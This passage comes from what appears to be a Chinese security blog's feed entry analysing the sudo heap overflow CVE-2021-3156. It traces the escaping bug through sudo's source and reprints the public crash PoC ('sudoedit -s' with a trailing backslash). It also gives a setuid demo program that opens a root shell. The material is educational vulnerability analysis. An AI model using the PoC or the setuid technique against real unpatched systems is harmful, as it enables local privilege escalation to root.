sudo_settings[ARG_USER_SHELL].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                <span class="comment">// 设置 flags 为 MODE_SHELL.</span></span><br><span class="line">                <span class="built_in">SET</span>(flags, MODE_SHELL);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">if</span> (!mode)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">/* Defer -k mode setting until we know whether it is a flag or not */</span></span><br><span class="line">        <span class="keyword">if</span> (sudo_settings[ARG_IGNORE_TICKET].value != <span class="literal">NULL</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (argc == <span class="number">0</span> &amp;&amp; !(flags &amp; (MODE_SHELL | MODE_LOGIN_SHELL)))</span><br><span class="line">            &#123;</span><br><span class="line">                mode = MODE_INVALIDATE; <span class="comment">/* -k by itself */</span></span><br><span class="line">                sudo_settings[ARG_IGNORE_TICKET].value = <span class="literal">NULL</span>;</span><br><span class="line">                valid_flags = <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果 mode 运行到现在都还没有设置，则默认设置为 MODE_RUN</span></span><br><span class="line">        <span class="keyword">if</span> (!mode)</span><br><span class="line">            mode = MODE_RUN; <span class="comment">/* running a command */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 如果设置了 MODE_LOGIN_SHELL</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">ISSET</span>(flags, MODE_LOGIN_SHELL))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">        <span class="comment">// 则继续设置 MODE_SHELL</span></span><br><span class="line">        <span class="built_in">SET</span>(flags, MODE_SHELL);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这样就可以成功进入处理转义字符的代码片段。</p><h3 id="2-set-cmnd-取消转义">2. set_cmnd 取消转义</h3><p>当程序执行完<code>parse_args</code>后，沿以下调用链最终调用到<code>set_cmnd</code>函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[], <span class="type">char</span> *envp[])</span></span></span><br><span class="line"><span class="function">    <span class="type">static</span> <span class="type">int</span> <span class="title">policy_check</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="type">static</span> <span class="type">int</span> <span class="title">sudoers_policy_check</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">            <span class="type">int</span> <span class="title">sudoers_policy_main</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                <span class="type">static</span> <span class="type">int</span> <span class="title">set_cmnd</span><span class="params">(<span class="type">void</span>)</span></span></span><br></pre></td></tr></table></figure><p>需要注意的是，只有在 parse_args 函数返回的 sudo_mode 设置了 MODE_RUN，才会调用 policy_check 函数，这是整条调用链上唯一的条件判断。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[], <span class="type">char</span> *envp[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">/* Parse command line arguments. */</span></span><br><span class="line">    sudo_mode = <span class="built_in">parse_args</span>(argc, argv, &amp;submit_optind, &amp;nargc, &amp;nargv,</span><br><span class="line">                           &amp;settings, &amp;env_add);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">switch</span> (sudo_mode &amp; MODE_MASK)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">case</span> MODE_RUN:</span><br><span class="line">        <span class="built_in">policy_check</span>(nargc, nargv, env_add, &amp;command_info, &amp;argv_out,</span><br><span class="line">                     &amp;user_env_out);</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在 set_cmnd 函数中，如果<strong>同时满足</strong>以下三个条件，则程序将会<strong>取消参数中的转义</strong>：</p><ul><li>sudo_mode 设置了 MODE_RUN | MODE_EDIT | MODE_CHECK。</li><li>NewArgc &gt; 1，即待执行程序的参数个数。</li><li>sudo_mode 还设置了 MODE_SHELL | MODE_LOGIN_SHELL。</li></ul><p>具体代码见如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Fill in user_cmnd, user_args, user_base and user_stat variables</span></span><br><span class="line"><span class="comment"> * and apply any command-specific defaults entries.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">set_cmnd</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// MODE 条件1</span></span><br><span class="line">    <span class="keyword">if</span> (sudo_mode &amp; (MODE_RUN | MODE_EDIT | MODE_CHECK))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">        <span class="comment">/* set user_args */</span></span><br><span class="line">        <span class="keyword">if</span> (NewArgc &gt; <span class="number">1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">char</span> *to, *from, **av;</span><br><span class="line">            <span class="type">size_t</span> size, n;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* Alloc and build up user_args. */</span></span><br><span class="line">            <span class="keyword">for</span> (size = <span class="number">0</span>, av = NewArgv + <span class="number">1</span>; *av; av++)</span><br><span class="line">                size += <span class="built_in">strlen</span>(*av) + <span class="number">1</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// MODE 条件2</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">ISSET</span>(sudo_mode, MODE_SHELL | MODE_LOGIN_SHELL))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">/*</span></span><br><span class="line"><span class="comment">                 * When running a command via a shell, the sudo front-end</span></span><br><span class="line"><span class="comment">                 * escapes potential meta chars.  We unescape non-spaces</span></span><br><span class="line"><span class="comment">                 * for sudoers matching and logging purposes.</span></span><br><span class="line"><span class="comment">                 */</span></span><br><span class="line">                <span class="comment">// 遍历传入的参数。</span></span><br><span class="line">                <span class="keyword">for</span> (to = user_args, av = NewArgv + <span class="number">1</span>; (from = *av); av++)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">while</span> (*from)</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="comment">// 如果识别出了反斜杠，则跳过第一个反斜杠，只复制二个反斜杠</span></span><br><span class="line">                        <span class="comment">// 例如 \$ 只复制 $</span></span><br><span class="line">                        <span class="comment">// 注意！该代码默认假设原先传入sudo的参数已经被转义。</span></span><br><span class="line">                        <span class="keyword">if</span> (from[<span class="number">0</span>] == <span class="string">&#x27;\\&#x27;</span> &amp;&amp; !<span class="built_in">isspace</span>((<span class="type">unsigned</span> <span class="type">char</span>)from[<span class="number">1</span>]))</span><br><span class="line">                            from++;</span><br><span class="line">                        *to++ = *from++;</span><br><span class="line">                    &#125;</span><br><span class="line">                    *to++ = <span class="string">&#x27; &#x27;</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                *--to = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-漏洞触发">3. 漏洞触发</h3><h4 id="a-具体细节">a. 具体细节</h4><p>由于 set_cmnd 函数的执行会<strong>基于原先传入sudo的参数已经在 parse_args 中被转义</strong>的前提下，因此如果传入的参数是以<strong>单个反斜杠</strong>结尾，则在取消转义的循环中，将会产生以下影响：</p><ul><li>from[0] 为反斜杠，但from[1] 是传入参数的 NULL byte。</li><li>由于满足<code>from[0] == '\\' &amp;&amp; !isspace((unsigned char)from[1])</code>，因此from指针向下移动 1 byte，指向参数的NULL byte。</li><li>执行 <code>*to++ = *from++</code>，将 NULL byte 复制到 user_args 堆数组中，同时 from 指针继续向下移动，指向 NULL byte的下一个字节位置（注意此时已经超出了参数的范围）。</li><li>如果此时 from 指向的不是NULL byte，那就继续循环<strong>越界写入</strong>数据至 user_args 堆数组中。</li></ul><p>但通常我们是没有办法传入一个<strong>单反斜杠</strong>进入 set_cmnd 函数中，因为在 parse_args 函数中，若 MODE_SHELL 或 MODE_LOGIN_SHELL 标志被设置，那么所有的转义字符将在 parse_args 函数中被转义，包括反斜杠。 （MODE_RUN 默认已经设置）。</p><p>但实际上，set_cmnd 中取消转义的条件判断与 parse_args 函数中添加转义的条件判断有所不同。</p><table><thead><tr><th style="text-align:center">Functions</th><th style="text-align:center">Mode Comditions</th></tr></thead><tbody><tr><td style="text-align:center">parse_args</td><td style="text-align:center">MODE_RUN &amp;&amp; MODE_SHELL</td></tr><tr><td style="text-align:center">set_cmnd</td><td style="text-align:center">(MODE_RUN | MODE_EDIT | MODE_CHECK) &amp;&amp; (MODE_SHELL | MODE_LOGIN_SHELL)</td></tr></tbody></table><p>那么我们能否绕过 parse_args 的添加转义操作，并到达 set_cmnd 的取消转义操作呢？即，能否在设置 MODE_SHELL 标志的前提下，取消 MODE_RUN 标志，但又设置了 MODE_EDIT 或 MODE_CHECK，使得可以绕过添加转义操作，并成功执行取消转义操作？</p><blockquote><p>上面说的条件有点绕，总结一下就是这样</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MODE_SHELL &amp;&amp; !MODE_RUN  &amp;&amp; (MODE_EDIT || MODE_CHECK)</span><br></pre></td></tr></table></figure></blockquote><p>答案似乎是否定的，因为如果我们直接给 sudo 传入<code>-l</code>或<code>-e</code>参数，则 valid_flags 标志将会设置为 MODE_NONINTERACTIVE 或 MODE_LONG_LIST。</p><p>而此时的 flags 标志为 MODE_SHELL 或 MODE_LOGIN_SHELL，因此使得我们无法绕过一个特殊的判断条件：<code>flags &amp; valid_flags) != flags</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">for</span> (;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ch = <span class="built_in">getopt_long</span>(argc, argv, short_opts, long_opts, <span class="literal">NULL</span>)) != <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">switch</span> (ch)</span><br><span class="line">            &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;e&#x27;</span>:</span><br><span class="line">                <span class="keyword">if</span> (mode &amp;&amp; mode != MODE_EDIT)</span><br><span class="line">                    <span class="built_in">usage_excl</span>();</span><br><span class="line">                <span class="comment">// 设置 mode 为 MODE_EDIT</span></span><br><span class="line">                mode = MODE_EDIT;</span><br><span class="line">                sudo_settings[ARG_SUDOEDIT].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                valid_flags = MODE_NONINTERACTIVE;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;l&#x27;</span>:</span><br><span class="line">                <span class="keyword">if</span> (mode)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">if</span> (mode == MODE_LIST)</span><br><span class="line">                        <span class="built_in">SET</span>(flags, MODE_LONG_LIST);</span><br><span class="line">                    <span class="keyword">else</span></span><br><span class="line">                        <span class="built_in">usage_excl</span>();</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="comment">// 设置 mode 为 MODE_LIST</span></span><br><span class="line">                mode = MODE_LIST;</span><br><span class="line">                valid_flags = MODE_NONINTERACTIVE | MODE_LONG_LIST;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 在此处将 MODE_LIST 更新为 MODE_CHECK</span></span><br><span class="line">    <span class="keyword">if</span> (argc &gt; <span class="number">0</span> &amp;&amp; mode == MODE_LIST)</span><br><span class="line">        mode = MODE_CHECK;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 必须绕过的特殊判断条件</span></span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; valid_flags) != flags)</span><br><span class="line">        <span class="built_in">usage</span>();</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但天无绝人之路，如果 sudo 是以 sudoedit 启动的（注意 sudoedit 是一个符号链接，直接指向 /bin/sudo），那么就可以在<strong>不修改 valid_flags 的前提下，设置 mode 为 MODE_EDIT</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Default flags allowed when running a command.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEFAULT_VALID_FLAGS (MODE_BACKGROUND | MODE_PRESERVE_ENV | MODE_RESET_HOME | MODE_LOGIN_SHELL | MODE_NONINTERACTIVE | MODE_SHELL)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="type">int</span> valid_flags = DEFAULT_VALID_FLAGS;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">/* First, check to see if we were invoked as &quot;sudoedit&quot;. */</span></span><br><span class="line">    <span class="comment">// 如果以 sudoedit 打开</span></span><br><span class="line">    proglen = <span class="built_in">strlen</span>(progname);</span><br><span class="line">    <span class="keyword">if</span> (proglen &gt; <span class="number">4</span> &amp;&amp; <span class="built_in">strcmp</span>(progname + proglen - <span class="number">4</span>, <span class="string">&quot;edit&quot;</span>) == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        progname = <span class="string">&quot;sudoedit&quot;</span>;</span><br><span class="line">        <span class="comment">// 则设置 mode 为 MODE_EDIT</span></span><br><span class="line">        mode = MODE_EDIT;</span><br><span class="line">        <span class="comment">// 注意之后就没有再设置 valid_flags了</span></span><br><span class="line">        sudo_settings[ARG_SUDOEDIT].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// 必须绕过的特殊判断条件</span></span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; valid_flags) != flags)</span><br><span class="line">        <span class="built_in">usage</span>();</span><br><span class="line">   <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 valid_flags 的默认值中设置了 MODE_SHELL 以及 MODE_LOGIN_SHELL ，因此可以通过该判断条件。</p><blockquote><p>所以最后，我们可以：</p><ul><li><strong>绕过</strong> parse_args 的<strong>添加</strong>转义操作。</li><li><strong>进入</strong> set_cmnd 的<strong>取消</strong>转义操作。</li></ul><p>并最终越界写入数据至堆数组 user_args。</p></blockquote><p>这个漏洞相当的理想，因为它可以使得：</p><ul><li><p><strong>user_args 堆内存长度可控</strong>。因为 user_args的长度取决于传入 sudoedit 的参数长度：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 该代码片段位于 set_cmnd 函数中</span></span><br><span class="line"><span class="comment">/* Alloc and build up user_args. */</span></span><br><span class="line"><span class="keyword">for</span> (size = <span class="number">0</span>, av = NewArgv + <span class="number">1</span>; *av; av++)</span><br><span class="line">    size += <span class="built_in">strlen</span>(*av) + <span class="number">1</span>;</span><br></pre></td></tr></table></figure></li><li><p><strong>越界写入的数据可控</strong>。因为存放传入 sudoedit 参数的内存位置与环境变量紧紧相临，因此我们可以通过<strong>指定特定环境变量</strong>来控制越界写入的数据：</p><p><img src="/2021/01/CVE-2021-3156/args_envs.png" alt="img"></p></li><li><p><strong>可以用单个反斜杠来写入单个NULL byte</strong>，具体请阅读上面的触发过程。</p></li></ul><h4 id="b-POC">b. POC</h4><p>Qualys漏洞团队给出了一个非常精简的POC，该 POC 可以触发 malloc 的 corrupt。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 执行指令</span></span><br><span class="line">sudoedit -s <span class="string">&#x27;\&#x27;</span> `perl -e <span class="string">&#x27;print &quot;A&quot; x 65536&#x27;</span>`</span><br><span class="line"><span class="comment"># 程序输出</span></span><br><span class="line">malloc(): corrupted top size</span><br><span class="line">[1]    411260 abort      sudoedit -s <span class="string">&#x27;\&#x27;</span> `perl -e <span class="string">&#x27;print &quot;A&quot; x 65536&#x27;</span>`</span><br></pre></td></tr></table></figure><p>可以看到这个 POC 满足我们刚刚所分析的那样：</p><ul><li>使用 sudoedit 设置 MODE_EDIT 标志</li><li>使用 <code>-s</code> 参数设置 MODE_SHELL 标志</li><li>后面带的参数中，有个参数以<strong>单个反斜杠</strong>结尾</li></ul><p>因此可以触发 crash。</p><blockquote><p>根据 Qualys 漏洞团队披露出的 exploit 构造细节（详见第二条参考连接），最少有三种构造 exp 的方式。但笔者调试时发现这其中存在一些问题：</p><ul><li><p>如果以第一种方式来越界写入<strong>将近 0x1000 个字节的数据</strong>至对应堆内存上，来覆盖函数指针，则在<strong>越界写入内存</strong>至<strong>使用函数指针</strong>的这个过程上，存在<strong>解引用被覆盖内存上的指针</strong>的操作，这将导致程序崩溃，且没有办法绕过。</p></li><li><p>如果以第二种方式来试图越界写入内存至 service_user 结构。由于 user_args 堆数组的地址<strong>高于</strong>后分配的 service_user 结构，因此我们没有办法覆盖到该结构。</p><blockquote><p>这个问题大概率受到 glibc 版本的影响，笔者在自己非标准 glibc 上测试会出现该问题。</p></blockquote></li><li><p>第三种方法难度较大，原理较为复杂，暂时没有去研究。</p></li></ul><p>至于为什么 Qualys 漏洞团队可以利用成功，可能是因为其 exploit 是 fuzz 出的，即可以使 sudo 恰好达到预期的目的（例如使用函数指针 / 欲覆盖对象在 user_args 堆数组的高地址处等等）。</p></blockquote><h2 id="四、小结">四、小结</h2><p>该漏洞实际上是低权限用户突破高权限程序的保护，从而获取高权限的情形。</p><p>我们可以执行以下命令，查看 sudo 程序的权限：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> /bin/sudo -al</span><br></pre></td></tr></table></figure><p>输出如下：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-rwsr-xr-x 1 root root 161512 Oct 29  2019 /bin/sudo</span><br></pre></td></tr></table></figure><p>可以看到，sudo 的 <strong>owner 是 root</strong>，<strong>权限是 <code>rws</code></strong>。<code>rwx</code>我们都知道是 可读可写可执行，但 rws 又是什么呢？</p><p>实际上，<code>s</code>标志代表的是 <strong>setuid标志</strong>。一个可执行文件在执行时，一般该程序<strong>只拥有调用该程序的用户</strong>具有的权限，而 setuid标志可以让普通用户以 owner 权限运行只有 owner 帐号才能运行的程序或命令。</p><blockquote><p>在 sudo 这个例子中，owner 是 <strong>root</strong>。</p></blockquote><p>因此，倘若<strong>含有 setuid 标志的软件存在漏洞</strong>，那我们就可以通过这些漏洞来<strong>获取更高权限</strong>。</p><p>以下是一个简单的 test case：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// test.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setuid</span>(<span class="number">0</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;setuid fail\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setgid</span>(<span class="number">0</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;setuid fail\n&quot;</span>);</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 当前为user权限</span></span><br><span class="line">g++ test.c -o <span class="built_in">test</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root ./test</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 4755 ./test</span><br><span class="line">./test</span><br><span class="line"><span class="comment"># 新开的 /bin/sh 为 root 权限</span></span><br></pre></td></tr></table></figure><p>即，对于那些 owner 为 root 、执行权限为 <code>rws</code>的程序，若该程序内部执行了<code>setuid(0)</code>和<code>setgid(0)</code>，那么该程序就成功提权至 root。</p><p>这个样例同样适用于 sudo 程序。</p><h2 id="五、参考">五、参考</h2><ol><li><p><a href="https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit">CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)</a></p></li><li><p><a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt">Qualys Security Advisory - Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)</a></p></li><li><p><a href="https://www.anquanke.com/post/id/229948">CVE-2021-3156：Sudo 堆缓冲区溢出漏洞通告 - 安全客</a></p></li></ol>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;sudo&lt;/code&gt;是Linux中一个非常重要的管理权限的软件，它允许用户使用 root 权限来运行程序。而CVE-2021-3156是sudo中存在一个堆溢出漏洞。通过该漏洞，任何没有特权的用户均可使用默认的sudo配置获取root权限。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;该漏洞可以影响从1.8.2~1.8.31p2下的所有旧版本sudo，以及1.9.0~1.9.5p1的所有稳定版sudo。&lt;/p&gt;
&lt;p&gt;Qualys漏洞团队于&lt;code&gt;2021-01-13&lt;/code&gt;联系 sudo 团队、&lt;code&gt;2021-01-26&lt;/code&gt;正式披露。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;由于这个漏洞原理&lt;strong&gt;较为简单&lt;/strong&gt;，同时又涉及到&lt;strong&gt;提权&lt;/strong&gt;这种高危操作，并且其影响广泛（笔者一台虚拟机、一个WSL以及一台阿里云服务器均可被攻击），相当有趣。所以我们接下来就来简单分析一下这个漏洞。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>浅析 V8-turboFan</title>
    <link href="https://kiprey.github.io/2021/01/v8-turboFan/"/>
